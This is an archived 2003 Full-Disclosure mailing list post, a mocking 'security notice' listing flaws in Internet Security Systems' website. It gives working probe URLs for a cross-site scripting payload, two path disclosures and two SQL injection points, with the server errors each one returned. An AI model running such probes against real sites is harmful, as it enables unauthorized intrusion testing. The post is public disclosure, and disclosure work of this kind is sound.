lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <3ebc6b56.67a80a17@s-mail.com>
From: mordred at s-mail.com (Sir Mordred)
Subject: @(#)Mordred Labs security notice - exploring the honeypot(s) in the wild

// @(#)Mordred Labs security notice 0x0003

Name: Exploring the honeypot(s) in the wild
Release date: May 10, 2003
Author: Sir Mordred (mordred@...ail.com)

I. INTRODUCTION

This is a second part of the security notice devoted to security companies.

Then why its called "Exploring the honeypots in the wild"?
Well, its simple, when i visited http://xfiw.iss.net and have read:

<quote>
As a normal course of their research, the ISS X-Force? places servers on
the Internet 
to monitor hacker activity, propagation of Internet worms and to serve as
targets for attack. 
These servers are known as honeypots. In some cases, honeypots are
purposely left insecure 
and mis-configured. Some honeypots are "visible" to the public via web
servers and web pages 
that are placed on the servers. All of ISS honeypots are constantly
monitored by the X-Force 
to better understand widely used hacking tools and techniques, but to also
to identify new attack 
routines and vulnerabilities. Several X-Force personnel are members of the
Honeynet Research Alliance.
</quote>

i laughed myself into fits and because of this nice quote i decided to
devote the whole notice to ISS.
After reading this notice you should clearly understand several important
points:

1) all of the ISS public servers are honeypots (i.e. serve as target for
attack), 
which in all cases "purposely left insecure and mis-configured"

2) not just several, but all of the X-Force personnel, including ISS tech
personnel, 
including  their admins/programmers are members of the Honeypost Research
Alliance,
so the notice should make you think twice before acquiring ISS service,
because you probably 
dont want your system to be just another honeypot on the net.

3) the notice will make to look some of the people as assholes, sorry for
that.

4) the notice will show how is the security audit looks like, web app audit
in particular, 
so i expect many security expers and pen-testers will be highly suprised
when 
they will hear that the security audit is not just
nmaping/nessusing/whiskering the target system.

5) it seems that some ISS web developers never heard about try { lame code
here } catch(Throwable t) {} trick,
maybe some Java tutorial like
http://www.tutorialbooks.com/for_dummies_idiots_guides/subjects/java_tutoria
l.htm would very be helpful ... 
wait, what? ... damn, i forgot that this is a honeypot! and it is
"purposely left insecure and mis-configured"...

As always, the format for vulnerabilities is:

<number>) [hostname, the company name]
quotes, comments (if exists)
* ISSUE <number> - description of the vulnerability
blank line
comments (if exists)
blank line
the url to demonstrate this vulnerability
blank line
the error message (if exists)


II. DETAILS

[ www.iss.net, Internet Security Systems Inc. ]

* ISSUE 1 - Multiple CSS vulnerabilities

I will not describe all of the CSS (there are too many of them)
vulnerabilities here, just one example.

http://www.iss.net/issEn/delivery/eventscalendar.jsp?regioncode="><script>al
ert(1)</script><"

* ISSUE 2 - Path disclosure in /issEn/delivery/eventdetails.jsp

http://www.iss.net/issEn/delivery/eventdetails.jsp?BV_EngineID=ccccadchmgkkk
jdcgencfhidglgdgij.0&oid=1

Script /opt/bvvar/english/scripts/delivery/eventdetails.jsp failed, reason:
cnt.get has no properties 

* ISSUE 3 - Path disclosure in /issEn/delivery/eventscalendar.jsp

http://www.iss.net/issEn/delivery/eventscalendar.jsp?regioncode=EM'

Script /opt/bvvar/english/scripts/delivery/eventscalendar.jsp failed,
reason: eventlist has no properties 

* ISSUE 4 - SQL injection in /issEn/MYISS/EditInfo.jhtml

https://www.iss.net/issEn/MYISS/EditInfo.jhtml?sid=s'

Received an exception:
Error: SQLException java.sql.SQLException: ORA-01756: quoted string not
properly terminated  

* ISSUE 5 - SQL injection in /issEn/DLC/evalForm.jhtml

https://www.iss.net/issEn/DLC/evalForm.jhtml?sid=s'

Received an exception:
Error: SQLException java.sql.SQLException: ORA-01756: quoted string not
properly terminated  


________________________________________________________________________
This letter has been delivered unencrypted. We'd like to remind you that
the full protection of e-mail correspondence is provided by S-mail
encryption mechanisms if only both, Sender and Recipient use S-mail.
Register at S-mail.com: http://www.s-mail.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030510/8f2bbfbe/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ